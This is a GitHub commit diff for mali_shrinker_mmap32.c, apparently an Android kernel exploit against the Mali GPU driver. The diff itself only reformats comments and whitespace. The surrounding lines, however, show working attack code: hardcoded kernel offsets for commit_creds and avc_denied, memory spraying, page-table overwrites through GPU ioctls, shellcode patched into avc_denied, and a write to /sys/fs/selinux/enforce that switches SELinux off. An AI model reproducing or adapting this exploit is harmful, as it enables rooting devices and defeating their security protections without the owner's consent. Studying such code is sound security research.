No commit message

SmileTabLabo · May 14, 2024 · fa01710 · fa01710
1 parent b3e8930
commit fa01710
Showing 1 changed file with 17 additions and 17 deletions.
diff --git a/mali_shrinker_mmap32.c b/mali_shrinker_mmap32.c
@@ -88,7 +88,7 @@ ADD_INIT = add x0, x0, #0x(Last 3 digits of INIT_CRED)
 #define COMMIT_CREDS_CTX_01_00_000 0x5a120 // 0xffffff80080da120 - 0xffffff8008080000 = 0x5a120
 #define ADD_INIT_CTX_01_00_000 0x910fc000
 #define ADD_COMMIT_CTX_01_00_000 0x91048108
-#define AVC_DENY_CTX_01_00_000 0x35acc8 // 0xffffff80083dacc8 - 0xffffff8008080000 = 0x35ACC8;//add
+#define AVC_DENY_CTX_01_00_000 0x35acc8 // 0xffffff80083dacc8 - 0xffffff8008080000 = 0x35ACC8 //add
 
 /*
  * Maintained by Syuugo
@@ -228,7 +228,7 @@ void setup_mali(int fd, int group_id) {
   if (ioctl(fd, KBASE_IOCTL_VERSION_CHECK, &param) < 0) {
     err(1, "version check failed\n");
   }
-  // struct kbase_ioctl_set_flags set_flags = {group_id << 3};
+  //struct kbase_ioctl_set_flags set_flags = {group_id << 3};
   struct kbase_ioctl_set_flags set_flags = {0};
   if (ioctl(fd, KBASE_IOCTL_SET_FLAGS, &set_flags) < 0) {
     err(1, "set flags failed\n");
@@ -342,7 +342,7 @@ void mem_commit(int fd, uint64_t gpu_addr, uint64_t pages) {
 
 uint64_t map_gpu(int mali_fd, unsigned int va_pages, unsigned int commit_pages, bool read_only, int group) {
   union kbase_ioctl_mem_alloc alloc = {0};
-  alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR; //| (group << 22);
+  alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR; // | (group << 22);
   int prot = PROT_READ;
   if (!read_only) {
     alloc.in.flags |= BASE_MEM_PROT_GPU_WR;
@@ -439,7 +439,8 @@ void reserve_pages(int mali_fd, int pages, int nents, uint64_t* reserved_va) {
     alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR; // | (1 << 22);
     int prot = PROT_READ | PROT_WRITE;
     alloc.in.va_pages = pages;
-    alloc.in.commit_pages = pages; // alloc.in.commit_pages = 0;
+    //alloc.in.commit_pages = 0;
+    alloc.in.commit_pages = pages;
     mem_alloc(mali_fd, &alloc);
     reserved_va[i] = alloc.out.gpu_va;
   }
@@ -512,7 +513,7 @@ int find_freed_idx(int mali_fd) {
 }
 
 int find_pgd(int freed_idx, int start_pg) {
-	printf("find_pgd, freed_idx is %d start_pg is %d  \n",freed_idx, start_pg);
+  printf("find_pgd, freed_idx is %d start_pg is %d  \n",freed_idx, start_pg);
   uint64_t* this_alias = alias_regions[freed_idx];
   printf("find_pgd, freed_idx is %d start_pg is %d  \n",freed_idx, start_pg);
   for (int pg = start_pg; pg < SPRAY_PAGES; pg++) {
@@ -659,10 +660,9 @@ void write_data(int mali_fd, uint64_t data, uint64_t* reserved, uint64_t size, u
   }
 }
 
-
 void write_func(int mali_fd, uint64_t func, uint64_t* reserved, uint64_t size, uint32_t* shellcode, uint64_t code_size) {
-printf("write_func called with code_size = %llu\n", code_size);
-usleep(300000);
+  printf("write_func called with code_size = %llu\n", code_size);
+  usleep(300000);
   uint64_t func_offset = (func + KERNEL_BASE) % 0x1000;
   uint64_t curr_overwrite_addr = 0;
   for (int i = 0; i < size; i++) {
@@ -701,9 +701,9 @@ int run_enforce() {
 int run_enforce_write() {
   char result = '0';
   sleep(3);
-    LOG("run_enforce_write before open %d\n", result);
+  LOG("run_enforce_write before open %d\n", result);
   int enforce_fd = open("/sys/fs/selinux/enforce", O_WRONLY);
-      LOG("run_enforce_write before write\n");
+  LOG("run_enforce_write before write\n");
   write(enforce_fd, &result, 1);
   LOG("run_enforce_write before close\n");
   close(enforce_fd);
@@ -820,26 +820,27 @@ void write_selinux(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved)
   write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), selinux_enforcing_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
 
   usleep(300000);
-  //Go through the reserve pages addresses to write to avc_denied with our own shellcode
+  // Go through the reserve pages addresses to write to avc_denied with our own shellcode
   write_data(mali_fd2, selinux_enforcing, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, 0, MALI_WRITE_VALUE_TYPE_IMMEDIATE_32);
 }
 
 void write_shellcode(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved) {
-/*  uint64_t avc_deny_addr = (((avc_deny + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
+/*
+  uint64_t avc_deny_addr = (((avc_deny + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
   write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), avc_deny_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
 
   usleep(100000);
-  //Go through the reserve pages addresses to write to avc_denied with our own shellcode
+  // Go through the reserve pages addresses to write to avc_denied with our own shellcode
   write_func(mali_fd2, avc_deny, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(permissive[0]), sizeof(permissive)/sizeof(uint32_t));
 
-  //Triggers avc_denied to disable SELinux
+  // Triggers avc_denied to disable SELinux
   open("/dev/kmsg", O_RDONLY);
   */
   //uint64_t sel_read_enforce_addr = (((selinux_enforcing_READ + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT) | 0x443;
   //write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_enforce_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
   //printf("sel_read_enforce_addr is %llx  avc_deny_addr is %llx\n", sel_read_enforce_addr, avc_deny_addr);
 
- uint64_t sel_read_handle_unknown_addr = (((sel_read_handle_unknown + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
+  uint64_t sel_read_handle_unknown_addr = (((sel_read_handle_unknown + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
   write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_handle_unknown_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
 
   //uint64_t sel_write_enforce_addr = (((selinux_enforcing_WRITE + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT) | 0x443;
@@ -853,7 +854,6 @@ void write_shellcode(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved
   //write_func(mali_fd2, selinux_enforcing_WRITE, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t));
 }
 
-
 void spray(int mali_fd) {
     for (int j = 0; j < SPRAY_NUM; j++) {
         union kbase_ioctl_mem_alloc alloc = {0};
@@ -909,7 +909,7 @@ int trigger(int mali_fd, int mali_fd2, int* flush_idx) {
       release_mem_pool(mali_fd, drain);
       printf("release_mem_pool\n");
       jit_free(mali_fd, atom_number, jit_id);
-	printf("reserve pages here\n");
+      printf("reserve pages here\n");
       reserve_pages(mali_fd2, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0]));
       LOG("jit_freed\n");